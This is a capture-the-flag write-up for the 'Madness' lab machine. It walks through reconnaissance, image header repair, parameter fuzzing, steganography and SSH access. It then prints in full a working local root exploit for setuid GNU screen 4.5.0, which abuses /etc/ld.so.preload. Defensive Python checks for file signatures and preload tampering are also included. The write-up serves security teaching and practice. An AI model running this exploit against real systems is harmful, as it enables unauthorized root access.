# Madness

## Nmap

```
sudo nmap 10.10.123.18 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 24.11 seconds
```

The default page for `http://<IP>` resolves to the Apache2 Ubuntu page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FzYzwetvP6KVmjkTdHKVb%2Fimage.png?alt=media\&token=162b2f0a-1445-4da5-875a-47e9f1d8bf59)

Looking at the page source code we find something of interest.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F8xqSd3Nf6j90lAgeMZak%2Fimage.png?alt=media\&token=a09a9cc0-06d2-4087-9839-2a2fbf43b698)

We can then use `curl` to download the JPG file.

```bash
curl http://10.10.123.185/thm.jpg --output thm2.jpg
```

From here we have no luck opening the file as a standard JPG file. I uploaded the file to an online hex editor to inspect it further.

{% embed url="https://hexed.it" %}

The hex editor shows that the file's header (its leading magic bytes) is actually the PNG signature rather than a JPEG one.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fj7PaBTu8deJjHVRLu76Z%2Fimage.png?alt=media\&token=6d9accdc-57d5-4167-9b85-2ca4938cb007)

Using the JPEG signature reference linked here: <https://www.file-recovery.com/jpg-signature-format.htm>.

We can rewrite the first line of bytes with the correct JPEG header so that the file identifies as the right data type.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F85A5SGLG15JiFRisbZpG%2Fimage.png?alt=media\&token=f6acfa3b-31a3-40e1-a8bf-6c7ae3fd1b5b)

After doing so the image can be exported and viewed correctly.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVUCAHg81UPF9zj091ShW%2Fimage.png?alt=media\&token=3da0e408-c3a2-44f0-ac5e-67e968691ad2)
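The same extension-versus-magic check and header repair, scripted rather than done by hand in a hex editor. This is an added example and not code from the writeup; the sample bytes are constructed, and the repair assumes, as the hex edit above does, that only the leading bytes of a JFIF JPEG were overwritten.

```python
"""Magic-byte check and JPEG header repair (added example, not the writeup's code)."""
from pathlib import PurePath

# Leading byte signatures for a few common image formats.
SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
EXT_TO_FORMAT = {".png": "png", ".jpg": "jpeg", ".jpeg": "jpeg", ".gif": "gif"}
# Canonical start of a JFIF JPEG: SOI, APP0 marker, length 16, "JFIF\0", version 1.1.
JFIF_PREFIX = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01"


def detect_format(data: bytes) -> str:
    """Return the format whose signature the data starts with, or 'unknown'."""
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return "unknown"


def header_mismatch(filename: str, data: bytes):
    """Return (claimed, actual) when extension and magic disagree, else None."""
    claimed = EXT_TO_FORMAT.get(PurePath(filename).suffix.lower())
    actual = detect_format(data)
    if claimed is not None and claimed != actual:
        return claimed, actual
    return None


def repair_jfif_header(data: bytes, overwritten: int = 8):
    """Rewrite the first `overwritten` bytes with the canonical JFIF prefix.

    Assumes only the leading bytes were replaced (here by the 8-byte PNG signature)
    and the rest of the JPEG is intact; returns None if the result still is not JFIF.
    """
    if overwritten > len(JFIF_PREFIX):
        raise ValueError("can only reconstruct the first %d bytes" % len(JFIF_PREFIX))
    fixed = JFIF_PREFIX[:overwritten] + data[overwritten:]
    # Sanity check: SOI marker present and the "JFIF\0" identifier sits at offset 6.
    if fixed.startswith(SIGNATURES["jpeg"]) and fixed[6:11] == b"JFIF\x00":
        return fixed
    return None


if __name__ == "__main__":
    # Constructed sample: a JFIF header whose first 8 bytes became the PNG signature.
    sample = SIGNATURES["png"] + JFIF_PREFIX[8:] + b"\x00\x00\x01\x00\x01\xff\xd9"
    print(header_mismatch("thm.jpg", sample), detect_format(repair_jfif_header(sample)))
```

The same mismatch check is a cheap triage rule for uploads or captured files: an extension that disagrees with the magic bytes is worth a closer look.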

The image presents the directory `/th1s_1s_h1dd3n`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FC6NIzQLSxtjUbJiY5igW%2Fimage.png?alt=media\&token=87dd2582-da85-4512-b35c-6a0532529f79)

Viewing the page source reveals the commented line:

```html
<!-- It's between 0-99 but I don't think anyone will look here-->
```

After some poking about I found that the main index page is PHP. Given this, and the lack of any obvious way to submit the secret mentioned above, it's probable that the `/th1s_1s_h1dd3n` directory takes a `PHP` parameter for input.

After some testing I found the following URL to be a valid parameter:

```
http://<IP>/th1s_1s_h1dd3n/?secret=1
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bd42f34d9012bc4bd1fb0b70f3e7c2e9863b7bfc%2Fimage%20\(2052\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\).png?alt=media)

I then used `ffuf` to automate this.

```bash
ffuf -u "http://<IP>/th1s_1s_h1dd3n/?secret=FUZZ" -c -w ~/Desktop/99.txt -fw 45      
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FLiheUThxVccLa0DKFfRe%2Fimage.png?alt=media\&token=39cf3dd2-60a3-461c-9014-6953634e5db5)

The number 73 appears to be the correct input.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FowUEfTtpoay8hdtjap4b%2Fmadness-jpg.png?alt=media\&token=9652117e-649f-4e37-b836-71084d4e1c20)

This password can be used with `steghide` to then extract secret information from the `thm.jpg` (with the correct JPEG header).

```bash
steghide --extract -sf thm.jpg
```

The extracted data gives us an encoded username. With the hint from the room, ROT13 can be used to decode the real username value, using CyberChef: <https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,13)>.

Unfortunately this part of the room had to be looked up, because the password information required to proceed is hidden in the image on the room page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FC6Be0h6Ayu5pmSJnkY9v%2Fimage.png?alt=media\&token=f73f6b1c-db06-4e42-a6d0-2e377cf81ee5)

```bash
steghide --extract -sf thm-image.jpg
```

We do not need a password to extract at least...

We now have all the information required to proceed with an SSH login as the user joker.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FYLtVSoWsuo9PZXTAYBwG%2Fimage.png?alt=media\&token=ea7a56ba-fae2-43ec-bf24-5cd651a7f6d1)

Through the standard enumeration checks we find the setuid bit is set on a non-standard binary, `screen-4.5.0`.

```bash
find /bin -perm -4000
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FvIWCDyrRMtFLMVWl3EdH%2Fimage.png?alt=media\&token=20d14b87-a7f6-4a73-810d-d42438ecd940)

A simple Google search for this binary shows various exploits, of which the simplest is shown below.

**Original vulnerability report:** <https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html>

**Github PoC:** <https://github.com/XiphosResearch/exploits/blob/master/screen2root/screenroot.sh>

```bash
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell
```

Create a shell script with `nano`, paste the code above into it, and execute it with `bash`. This gives us a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FoYGwaevyJFFYrKtgSlGB%2Fimage.png?alt=media\&token=016bc6c5-9d87-4436-a22e-d6917fd77dc1)
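The privilege escalation above rests on `/etc/ld.so.preload`: the dynamic loader preloads every library named in that file into every dynamically linked program, so a root-run `screen -ls` picks up the attacker's library. A host-side audit of that file is the defender's counterpart, shown here as an added example (not from the writeup, and not part of screen); the set of "trusted" library directories is an assumption you would tune per distribution.

```python
"""Audit ld.so.preload for the abuse pattern used above (added example, not from the writeup)."""
import os
import stat

# Directories a legitimately preloaded library is expected to live in (assumption).
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/lib32/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")


def _file_findings(path: str, kind: str):
    """Ownership/permission findings for one file; kind is 'preload' or 'lib'."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [(kind + "-missing", path)]
    if st.st_uid != 0:
        findings.append((kind + "-not-root-owned", path))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((kind + "-group-or-world-writable", path))
    return findings


def audit_preload(preload_path: str = "/etc/ld.so.preload"):
    """Return (finding, path) tuples; an empty list means nothing to report.

    The loader preloads every library listed in this file into every dynamically
    linked program, so its mere presence, writability, or an entry outside the
    system library directories is worth alerting on. A missing file is the normal
    state and produces no finding.
    """
    if not os.path.exists(preload_path):
        return []
    findings = [("preload-present", preload_path)] + _file_findings(preload_path, "preload")
    with open(preload_path, "rb") as fh:
        entries = fh.read().decode("utf-8", "replace").split()  # whitespace-separated list
    for lib in entries:
        if not lib.startswith(TRUSTED_LIB_DIRS):
            findings.append(("lib-outside-trusted-dirs", lib))
        findings.extend(_file_findings(lib, "lib"))
    return findings


if __name__ == "__main__":
    for finding, path in audit_preload():
        print(f"{finding}: {path}")
```

Because the exploit's constructor removes the preload file again, this check catches the window while it exists; pair it with file-integrity monitoring on `/etc/ld.so.preload` and an inventory of setuid binaries like the `find` above.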
